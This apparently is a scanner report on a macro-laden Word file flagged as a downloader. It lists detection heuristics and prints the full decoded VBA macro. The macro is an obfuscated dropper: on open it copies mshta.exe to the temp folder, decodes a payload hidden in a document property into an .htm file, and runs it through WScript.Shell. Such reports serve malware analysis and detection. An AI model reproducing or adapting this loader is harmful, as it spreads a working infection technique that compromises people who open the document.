MALICIOUS
138
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Call CreateObject("ws" + aZkYAJ + "ell").run(ayH6r) -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
ayPJL = Environ(aojfL) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15833 bytes |
SHA-256: edaf28c800991fe7fa669e4286da8888a73672f65519dd67fb787c6c8dc00327 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aRX2s"
Sub AutoOpen()
' Polygamy programming incognito
aET2r
End Sub
Attribute VB_Name = "aEgw5"
Public Const aumx2 As String = ""
Public Const a0Yne As Integer = -240 + 253
Public Const aQ7VJg As String = "1ridn1iw1"
Public Const aSEWd As String = "231met1sys1"
Public Const afB16 As String = "p1m1e1t"
Public Const aZkYAJ As String = "cript.sh"
Function abnZx()
End Function
Sub afloa(aM1lJT)
' Transit composition
' Mashed racket fu spotlight spice
' Receives syria punk magnolia listless unearthly
' Itself
' Baby kinship gradually
' Suspension smoldering jacky voltaic horizontal journalism helpful
' Christine pop
' Syracuse cos lie
' Lease oust
' Holler cherokee unwrap
' Sheen
' Retract undeniable
' Witch pro amazingly wicker
' Cp oe wr
' Weasel prefect
' Remembered hoe stuck buxom graduate
' Prosy biol
' Consciousness contiguous disquiet ana compare hostage john
' Domains pumps
' Catherine drawings crops decomposition transcendental cleaner quartet
' Ag benedict gnu confused
' Mop
' Flat katharine abominably equator
' Flemish racks convertible diet
' Barcelona capitol
' Than scoff hydrocodone anchorage
' Gage
' Eating grain veined abstract cubit
' Blunderbuss purse mumbai inc.
' Twice merit downloading hoot
' Esthetic betake
' Occupancy crown yesterday passable
' Disclaimers communities priority intangible rentals
' Mysticism netherlands recommendation
' Conciliatory definitive
' Fashion turbulence fioricet difficult porphyry reprobate
' Chapman besiege
' Disagree decorative solutions
' Swoon
' Neigh peaked aspirant metro amino
' Cobweb bridesmaid scientist
' Cup blink pest
' Omissions spoonfuls
' Woeful hilarious red-hot
' Farcical hasan champagne
' Avon package swede
' Reggie string looped planning
' Unanimity
' Scottish shovel
' Physically postscript hot
' Apr canyon trickle
' Beverages leech scandinavia equator
' Swivel european light replacing flemish
' Gashed 911 amassed memphis
' Slavish penury bloodhound updating tricks
' Phys greyhound swamped
' Warcraft movies
' Satrap pheasant illustrator finery
' Idol il
' Tones
' Magisterial knell bored coax
' Then
' Inbox
' Wordy botany trace
' Urbanity hindu brescia
' Newbie marina revel
' Currency convinced
End Sub
Function aeJKQF(at2kAV)
aeJKQF = ActiveDocument.BuiltInDocumentProperties(at2kAV)
End Function
Public Sub a4foe()
aDoMr
End Sub
Public Sub a2yQM()
' Purchase christie ion
' Cho initiate
' Outdoors maltese bubbles justice
' Apr stratum
' Kilometers accessions legs
' Deduce revelation knell
' Login service adjunct drunk guinea dent
' Mammy humbug
' Richards romeo christian
' Lady nancy farms sphere
' Rocker miscarriage craters advisers
a61Nk5
End Sub
Attribute VB_Name = "a0lvJ"
Public Function aNOmzL(a6DXG, adhZw)
' Fittest
' Capacity uncover
' Constitutes lunar buzzing stubble
' Reproduce lexus rn dodge
' Grande rocket ask stand egress
' Choice brokers accompanied comic contrasting depleted
' Absences go-between untried
' Epidemics tributaries educator committee dave tally
' Adage drawings afghan paris
' Detriment mediawiki oe vast
' Dote on
' Belated pests tripadvisor
' Nascent cigarettes wayfarer
' Embedded erst sectarian
' Regency papua
' Laws achieved watching
' Breakdown asn eph. k fiji leash uphold
' Revealed manhattan formerly
' Pushing costa
' Gadgets staffordshire beet revolting
' Mozilla banjo advantages relay
' Killed co josh starboard
' Attributes expired ephesians algorithms inches
' Occupation discourage residue
' Intellectually cnet technological abbreviations hero
' Ephemeral ebony rigorous
' Films guess
' Tilt jaundice
' Honduras dwelling-place
' Zdnet
' Pixel
' Proficiency interrogate chancery prescription satellite bonds
' Dreams research conjugal loin
' Republican stamp tribune millinery
' Tee russet
' Pricing abstemious attending
' Votive
' Fuji depose muscles jungle
' Cask portsmouth trades ocr bicycle
' Learner immigrants fullness abdominal services blues
' Necklace doe shirts revelation
' Balanced tools shaped compromise
' Hertfordshire dab
' Unutterable claret gem
' Funding spouting dugout
' Prevent folks
' Linguist scan im- tidy
' Threesome elementary chris flu
' Occasionally emigrant
' Spokesman closer hexameter sees expedite
' Papyrus confounding
' Pregnancy
' Chemist february juicy
' Injection
' Render japanese contracting
' Local did
' Apse precept
' Ta flyer shows applicant
' Beverly stranger feud spellbound
' Gulf
' Metres dame forum
' Unrequited larynx kilometers hammock
' Longer wherever authorize exceptionally impassive which
' Droll radar delirious eliminate tulip
' Mediterranean without upholstery tacked voted burmese tomatoes outside
FileNumber = FreeFile
Open a6DXG For Output As #FileNumber
' Love-making Word
' Recorder teas byte samaria
' Why dappled
' Interpretation maybe amaryllis wi cage provisions
' Tickets seraphic stopping aj passover
' Interstate pot autocrat apoplexy peers cricket
' Bloggers let
' Portraiture fervour
' Topeka barnet jurist costa target
' Wicker evaluated permits starred
' Consisting dagon vestal crosswise relocation martha
' Breakfast steam
' Screening
' Ant housewares opiate suggest thread
' Tips blots baden conservation installation
' Motherless transgression instantaneously imitator guts capitol
' Grounded
' Violation workers lichen socialism
' Bristling
' Amazing baker edification
' Extend palmy dj qualified
Print #FileNumber, adhZw
Close #FileNumber
End Function
Sub aAFhs(aBJIDU, aXyqC)
' Uptown speaking
' Beaker scripts
' Puerto capstan implicit ronald
FileCopy aBJIDU, aXyqC
End Sub
Function aQN9v(and4c)
' Gibraltar authorization champions terrestrial
' Anderson coupled plantain
' Suckling sophie distended
' Hc surprised funding
' Drawbridge twaddle slum
' Akimbo killing looped pushing
' Pali atrocity
' Ba piecemeal fiction amelioration vcr
' Newer commodities exhort comm
' Partiality gnu cancelled fusillade proceedings
aQN9v = and4c
End Function
Function aZqytn(and4c) As String
Dim azT7fq As Long
Dim aDuHxW As Integer
Dim asJcM As Integer
For azT7fq = 1 To Len(and4c)
asJcM = 0
' Charts mineral augmentation pathology shooting
' Gives optional ultra specially dom
' Untamed
' Probabilities swoon slink
' Knocker
' Attest competitor comprise characterized
' Bunting
' Disapprove stroke
' Punjab huntsman
' Lover belly slush doggerel
' Flare utrecht brick hole physiology
aERlV = Mid(and4c, azT7fq, 1)
' Cloven jun fervour composition imo
aDuHxW = Asc(aERlV)
If (aDuHxW > a7Rswn(27181 - 27180) And aDuHxW < a7Rswn(11722 - 11720)) Or (aDuHxW > a7Rswn(19986 / 6662) And aDuHxW < a7Rswn(6485 - 6481)) Then
' Flutes ceremony social gazette asked
' Sciences corsica tin pointed minor
' Detailed mural lief
' Locations scuba
' Ip trainers
' Upcoming program absented cramps carboniferous carol
' Volume encryption da
' Sedentary onto belittle georgia seedling winnings
' Beings inlet bolster
' Wring 411 energy ppm underground kerosene
' Bibliographic pisa messaging
asJcM = a0Yne
aDuHxW = aOw5UE(aDuHxW, asJcM)
If aDuHxW < a7Rswn(5) And aDuHxW > 83 Then
aDuHxW = a1yEx(aDuHxW)
ElseIf aDuHxW < -326 + 391 Then
aDuHxW = a1yEx(aDuHxW)
End If
End If
' Totally cook manchu
aJ8wWs = armLbO(aDuHxW)
Mid$(and4c, azT7fq, 1) = aQN9v(aJ8wWs)
Next azT7fq
aZqytn = and4c
End Function
Attribute VB_Name = "ajA1T"
Function azO7g(auhTUt)
' Currencies ages coverage gras dim
aIEbg = auhTUt
aQNmW = Len(aIEbg)
For ayCqf = 0 To aQNmW - 1
' Read sepulchral java untenable
acKUh = acKUh & Mid(aIEbg, (aQNmW - ayCqf), 1)
Next ayCqf
azO7g = acKUh
End Function
Public Function abJ7CM(a9ecu1)
' Steppe artless epirus mangy peterborough
' Cultural controller sedan
' Spoonfuls sheila boomed
' Floyd freight clinics
' Xxx lynn repository
' Bazaar
' Freud candied
' Terse bound
' Tuneful educated townspeople utc proportion
' Baseball laud
' Belong pallet laziness capitol shortening
abJ7CM = Replace(a9ecu1, aumx2, "")
End Function
Sub aET2r()
' Despotic nag mac carp
' Arbitration
a4foe
' Bonnie collegiate demonstrate semicircle broker
' Advisory vatican fl
' Arrested nipple
' Tahoe unabated
' Transmigration
' Chi
' Hard-headed fist excommunication
' Leniency remaining
' Forefront holly durable hark
' Concepts barcelona silent
' Darken backwoods wa streams
a2yQM
Call CreateObject("ws" + aZkYAJ + "ell").run(ayH6r)
End Sub
Attribute VB_Name = "aEHX8"
Function ayPJL(aojfL)
ayPJL = Environ(aojfL)
End Function
Function anJrh()
' Xxx k functional
' Advisory promotions liberia astronomy
' Phoenix surname persevere drought
' Principal cinder
' Licking represented declamation psyche overnight
' Dem sensitive knoll
' Ton dour clammy impossible mens
' Subject-matter
' Wedge
' Unmanned
' Ds queens payday aide
' Cameo tacitly unconcern trusts accented
' Ion metaphysics
' Outlay daytime risky
' Nevada
' Treasurer
' Restrict turret transgressed lullaby
' Companion sikkim depress bunting dissent pigtail benefice ryan
' Revert titania anniversary endanger
' Nato travelling
' Hamper
' Sustainability brandon
With Application
anJrh = .PathSeparator
End With
End Function
Function a05yc(ad32K)
' Lodges euripides wash mohammedan rueful
' Handcuffs axis syllogism sharon
' Worldwide niger commissions opinions
' Dividend gesticulation shoal abased big
' Second corporation omniscient mauve
' Quill err fucking genealogy
' Ply premium ooze
' Joyce dispel nicaragua copied
' Match canticle eclipse aruba emotions veneer
' Outdo bruges dennis
' Terrify kenny
a5ibN = VBA.Split(azO7g("lmth.ni|moc.ni|exe.athsm"), "|")
' Bird vita
' Valentine aver bewitch namely genealogy
' Promotes
' Postal narcissist
' Contagious brave lo rev riley
' Tally redoubtable ao offer
' Quince verbs pubs welter
' Homestead co conclusion
' Libraries subjective chamber passive pointing intellectual
' Disembark apes
' Crank clamor gram
' Chelsea corfu uncertainty
' Lo unemployed disclaimer
' Capitulation locomotive que
' Allergy
' Belong sedge
' Lightning happen
' Hills active lebanon burdensome spears
' Incompetent poop gut webshots pease curving
' Ships gays
' Ed
' Chatty ricky undefined romance stench
' Optical municipality
' Secure deafness urgent
' Parcel after waning edification paragon advisory
' Desired tripadvisor ahoy cast consumptive interpolation
' Pup enemy font
' Bow vegetation
' Collects diphtheria documentary
' By
' Sunglasses newcastle components
' Stat shrivel cb
' Ofries republic denmark cobweb initiation
' Conrad esperanto reflex reality
' Chicks deranged
' Verity debonair prev
' Invention disband carlos
' Invert obtaining numerous castaway
' Merry tanks bluntly ecommerce ccc formula
' Heifer reduction fibre dormant
' Bevis rom scapegrace
' Perfectly insights gasoline worlds traditionally
' Themes balustrade stones hawaiian
' Constantly fiji
Select Case ad32K
' Codes tart dem sill serb jo.
' Provinces ferrara gull lithuania aquiline boxed
' Surfing aerial enunciation
' Fw candor compost
' Establish unwrap
' Blow
' Variability nominations availability frivolity
' Untruth retinue despondency
' Asian loch ducal lies modifies
' Occult rachel less
' Lease sully embody customers servitor
Case 0:
a05yc = ayPJL(Replace(azO7g(aQ7VJg), "1", "")) & anJrh & Replace(azO7g(aSEWd), "1", "") & anJrh & a5ibN(0)
' Lint epithet
' Fetching drilling burrow entrust colombo pace
' Transmigration possibilities distrustful dropsy
' Elope intensive objectionable registration
' Sophie
' Upturned fy differential diabetes
' Expires louisiana
' Cite
' Lorenz lug
' Brain piano frontispiece erik peas
' Spiritual bilateral refinance baptised promo magenta
' Safely concurrent
' Telecharger
' Shown ntsc apnic secrete
' Spain soundtrack
' Cells damages
' Risk accountant
' Pop lawsuit glutton courses
' Exploring ky
' Capabilities boss paleness provencal sexual occupant
' Ep counsel notifications obadiah tourism
' Durance
Case 1:
' Telegraphic undaunted prepared seeking nicole ff
' Watchman warm-hearted leaving
' Sufficiency
' Operational dissimilarity recommends bean far-fetched
' Prehistoric ram encounter
' Listing grasshopper incredulous right documented
' Saturn branch octavo
' Orbit careworn visual mar prune
' Honors ballet per
' Abounded riley herbal
' Greenery buffeted exalting
a05yc = ayPJL(Replace(azO7g(afB16), "1", "")) & anJrh & a5ibN(1)
' Damnable
' Retrace thesaurus kitty compliant musty
' Derived oc
' Erik
' Approach bombard expence montgomery base denounce
' Soliloquy baroness complications distillation
' Beans bbc presuppose increasingly gram
' Uc schema
' Disability contest legends
' Bandage viewpoint pears
' Billow
' Gloat recalcitrant evident
' 12mo limousines veterans mammoth antigua
' Routing security espionage
' Manufactured with toilsome prescribed
' Agate
' Capita lc
' Bass mathematician
' Gent phosphorescent
' Breaking higher passive whatll constructed dont adjutant
' Reuters taboo seem breach fifty simultaneously
' Consequences mars pubmed
Case 2:
' Tumultuously psychic intro
' Sn move basename farm
' Jack parvenu vanguard citizens african
' Saline enhance accurately crater
' Upset apt cuckoo priceless flags
' Tardily hogshead
' Sturgeon master applying
' Kingdom morass revised cavalcade impetus
' Bluntly palette aroma dreamer im cowper mutation
' Hera nuclear cooperative ra magnet
a05yc = ayPJL(Replace(azO7g(afB16), "1", "")) & anJrh & a5ibN(2)
End Select
End Function
Sub a61Nk5()
aVOEx = ajCxS(a05yc(2))
aNOmzL aVOEx, aZqytn(aeJKQF("category"))
End Sub
Attribute VB_Name = "aRCvq"
Function asNOEC(ahO3QY)
asNOEC = (abJ7CM(ahO3QY))
End Function
Function aIb9Ch(aNazx)
' Eastern generates linda configuration presented
' Prowl ceramic pyramids rover
' Accessed raven
' Graduate toolbar pharmacies competing
' Tinsel domesticated favorably
' Interstate consist veda casinos
' Ellen sexuality
' Guards administered oppressor fold
' Mesopotamia carbolic
' Reprimand wedding
' Somewhat exodus amulet
' Harmony sycamore apnic printer lite
' Businesses keyboard
' Meaningful scow qualm footstep poll -oid
' Variable bubble organizer paul
' Whales eye-witness
' Indicator shatter austin aberration redundant power
' Louse potassium plots ebony
' Forsook abdul delivered
' Portfolio ignominious trade replies
' Worship hoot
' Remainder
aIb9Ch = (abJ7CM(aNazx))
End Function
Function ajCxS(aaLgt)
' Stab annotation vin mixture scissors harps
ajCxS = (abJ7CM(aaLgt))
End Function
Function ayH6r()
asK7Gf = aIb9Ch(a05yc(1))
aJ2cy = ajCxS(a05yc(2))
ayH6r = asK7Gf & " " & aJ2cy
End Function
Attribute VB_Name = "aNFrp6"
Sub aDoMr()
amXSNx = asNOEC(a05yc(0))
a4U2Pq = aIb9Ch(a05yc(1))
aAFhs amXSNx, a4U2Pq
End Sub
Function a1yEx(apOSo)
a1yEx = apOSo + 5434 / 209
End Function
Function a7Rswn(aHBKLv)
If aHBKLv = 0 Then
a7Rswn = 25033 - 25032
ElseIf aHBKLv = 1 Then
a7Rswn = 21632 / 338
ElseIf aHBKLv = 2 Then
a7Rswn = 35 + 56
ElseIf aHBKLv = 3 Then
a7Rswn = 12 * 8
ElseIf aHBKLv = 4 Then
a7Rswn = 87 + 36
ElseIf aHBKLv = 5 Then
a7Rswn = 257 - 160
Else
a7Rswn = 24576 / 24
End If
End Function
Function aOw5UE(apOSo, aRV8Cr)
aOw5UE = apOSo - aRV8Cr
End Function
Function armLbO(apOSo)
armLbO = VBA.ChrW(apOSo)
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 59392 bytes |
SHA-256: 02041e5385ee4a3397fc5e0fa4ff8e7d92cdb06412c5508127d52101c781eeac |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.